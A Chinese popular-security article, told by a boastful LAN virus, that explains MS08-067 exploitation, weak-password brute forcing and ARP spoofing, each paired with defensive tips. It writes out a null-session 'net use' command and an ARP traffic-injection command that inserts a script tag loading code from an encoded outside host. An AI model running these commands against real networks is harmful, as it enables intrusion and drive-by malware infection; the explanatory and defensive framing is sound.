老病毒的自述:局域网中的风光

X（局域网型病毒）是生活在局域网中的程序，每天自由穿梭在各种局域网中，虽然时常被赶走，但它仍然是家族兴旺，声势显赫，这

>> 老病毒的自述：局域网中的风光 局域网中VLAN的划分 注意局域网中的环路 浅论局域网中ARP病毒的攻击原理 局域网中ARP病毒的分析及防范 局域网的维护 无线局域网中的安全措施 局域网BBS中的“豫、时、孙、摩” VPN技术在无线局域网中的应用 无线局域网在企业中的应用 无线局域网中的网络优化问题探讨 无线局域网在高校中的应用 局域网中的卫视广播（1） 局域网中的卫视广播（2） 局域网中的卫视广播（3） 局域网中的卫视广播（5） 局域网中的卫视广播（4） 局域网中的卫视广播（6） 局域网中的卫视广播（7） 局域网中的通信协议 常见问题解答 当前所在位置：

2.远程溢出

4.莫里斯蠕虫 ?wtp=tt

X的风流往事――辉煌的家族史

X把Y揽在怀里，把自己的“丰功伟绩”和家族历史吹嘘起来。

在很久以前那个电脑稀缺的年代，人们都不相信病毒能够从一台电脑转移到另外一台电脑，X小时侯扮演了“莫里斯蠕虫”，第一次从一台电脑传播到另外一台电脑。局域网慢慢地发展起来，他靠“感染快，扩散广，难以清除”三板斧，攻城略地，那是惊天地泣鬼神。巅峰时期家族可谓是人丁兴旺啊，冲击波、震荡波、魔鬼波三人结合电脑弱点，攻击江湖无人能敌；熊猫烧香兄弟社工专家，一手密码穷举绝活，满城尽是三炷香；ARP鼻祖老当益壮，铁齿铜牙忽悠网关没话说。

咱们的生存之本是局域网，局域网内存在大量的漏洞，我就会带着兄弟们牢牢抓住局域网的弱点通过局域网口令破解、漏洞攻击、ARP攻击等方法在网内快速传递。同时咱们会对抗杀毒软件，让安装的杀毒软件失去它的作用，即使有人发现自己中毒并通过系统还原或者格式化的方法清除了病毒体，但是只要我X在局域网内任一台电脑上还存活着，避过风头后就能使整个网络重新被感染。这时的局域网，轻则降低速度，重则网络崩溃，破坏服务器信息，那叫一个过瘾呐！

X的血泪史――与战警A的几场惨战

老X回忆完自己的辉煌，欣喜之余也想起了当年年少轻狂，运用自己的独门秘笈，虽做了不少大事，不过也因此与杀毒软件进行了几场恶战。这不又讲开故事了！

恶战一 扫荡波系统弱点攻击

当时我学会了一招“扫荡波”，主要用来进行漏洞攻击，简单地说就是钻局域网电脑操作系统的空子传播自身，虽然功力比不上前辈冲击波、震荡波但是造成的破坏可不小。

一方面局域网的电脑常常会因为病毒问题或者其他原因重新安装系统，如果不及时安装严重级别的系统补丁，就有可能因为严重的系统漏洞让咱们得以生存并控制整个局域网。

真实再现

那天，我找到一台存在漏洞的电脑，首先获取本地IP地址，通过端口扫描器扫描所在网段的445端口，看看哪些电脑的445端口是活跃的（见图1）

(1)

hacktcp 127.0.0.1 127.0.0.255127.0.0.1 445，然后我就利用MS08-67漏洞，尝试着攻击存在漏洞的主机，仅需三步我就得手了。

1.建议空连接，net use \\ip\ipc$ /user: "" ""。

2.连接管道/pipe/brower，相当于本地一个共享，可以让远程计算机读写的文件。

3.调用存在漏洞的NetPathCanonicalize函数，构造一个畸形字符串，导致远程溢出从而下载一个病毒到远程主机并执行。

于是我将方法教给其他兄弟，大家好好乐了一场，可谁知好景不长，战警（杀软）出现了，一个是360安全卫士，一个是金山清理专家，他们偏偏用“手”里的漏洞扫描工具对系统进行漏洞检测和修复，使得很多兄弟丧失。

恶战二 系统弱口令

听完这段故事，Y有点遗憾，X怕坏了兴致，就说“爷爷当然没那么笨了，我还有新招呢！现在Ghost系统很流行，局域网内的电脑也大都不设置密码，或者密码很简单，我们可以通过口令破解入侵局域网的系统从而上传病毒文件执行，那时爷爷就学了一招“熊猫烧香”，目的就是来个山寨版的‘人肉’搜索，可以扫描整个局域网，看看哪些电脑活动着，再通过一个密码字典进行暴力破解密码，成功后获得权限就能为所欲为了。”

真实再现

有一天，我悄悄溜进了一台电脑，惊喜地发现局域网众多主机都存在弱口令（密码强度低）问题，我使出“熊猫烧香”，先遍历感染者所在局域网，寻找可以连接上的“肉鸡”，尝试利用密码字典对可以连接上的电脑进行攻击，以求暴力破解账号，比如，用户名“Administrator 1234”、“Admin 123456”。然后我就将一些病毒兄弟复制到目标电脑的开机启动文件夹（比如“C:\Documents and Settings\All Users\Start Menu\Programs\Startup”目录），让大家在电脑重新启动的时候运行起来。

这时旁边的一病毒兄弟听不下去了，嘴里嘟囔着，后来不还是被这几招给破解了吗？

1.修改计算机默认用户名，并设置高强度密码，类似这样的用户密码组合：@zhaobudao7878，yigemima@163。

2.关闭计算机一些存在风险的服务程序，并重命名一些可能被黑客利用的文件，比如“ftp.exe”常被黑客从远程下载病毒到肉鸡电脑。

3.安装一款反黑客防火墙比如卡巴斯基个人防火墙，可以很好地防范一些低级黑客入侵电脑。

恶战三 真假网关

X收拾下被打击的心情，重新教导起Y来：“当病毒，还想不被杀，那就得不断学习，提高自己的技能，那会儿我就是花费了好长时间才钻研出‘ARP欺骗’的秘诀，变身ARP病毒，风光了好一阵。一旦成功入侵系统我就会伪装成网关，并劫持网络内所有HTTP通讯，并且强行在HTTP数据包中插入带有病毒程序的网页链接，使得局域网内任意一台电脑在访问正常网页时，都会自动下载木马病毒。也就是说，只要局域网内有一台计算机感染了该木马，局域网内所有的计算机就都有可能被感染上木马病毒。”

真实再现

那天，我正玩得起兴，突然杀毒软件开始报警，反复提示发现病毒，说有ARP病毒不断地发包进行攻击：他通过网络分析软件WinPcap提供的网络分析功能，劫持网络内所有HTTP通讯，发现了我在电脑里留下的文件：“C:\WINDOWS\SYSTEM32\drivers\npf.sys”。我哪管这个，继续在HTTP数据包中插入带有恶意代码的网页链接，使得局域网内任意一个用户在访问正常网页时都会同时执行恶意网页代码（见图2），这招就是“wacldlt．exe　－idx　0　－ip　192．168．0．2－192．168．0．254　－port　80　－insert　＂＜script　language＝javascript　src＝http：／／％77％2E％63％36％36％64％2E％63％6E／lg．js＞＜／script＞”。这段命令的意思是监听80端口（上网的默认端口），当局域网的用户通过80端口访问网络的时候，就在网页代码插入一个恶意构造的框架结构。接下来自然是老套路，在中招电脑中找一些可被利用的漏洞，触发它们，然后让病毒兄弟们都过来，一起“娱乐”。

(2)

当然也都是风光往事了，现在ARP风火墙都可以有效防范，像金山ARP防火墙、彩影ARP防火墙之类的软件防火墙都是死敌，Y你可要记清哦！